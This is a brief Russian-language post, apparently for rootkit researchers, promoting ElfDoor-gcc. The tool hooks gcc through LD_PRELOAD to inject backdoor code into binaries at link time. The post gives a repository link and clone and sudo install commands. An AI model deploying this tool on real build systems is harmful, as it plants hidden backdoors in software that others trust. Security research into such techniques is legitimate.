
Инструмент на основе LD_PRELOAD, который перехватывает gcc для внедрения вредоносного кода в бинарные файлы во время линковки, что позволяет скрытно развернуть бэкдор без изменения исходного кода.
ElfDoor-gcc — это LD_PRELOAD, который перехватывает gcc для внедрения вредоносного кода в бинарные файлы во время линковки, без изменения исходного кода.
Подробная статья: https://matheuzsecurity.github.io/hacking/gcc/
git clone https://github.com/MatheuZSecurity/ElfDoor-gcc
cd ElfDoor-gcc
chmod +x install.sh
sudo ./install.sh
Исследователи руткитов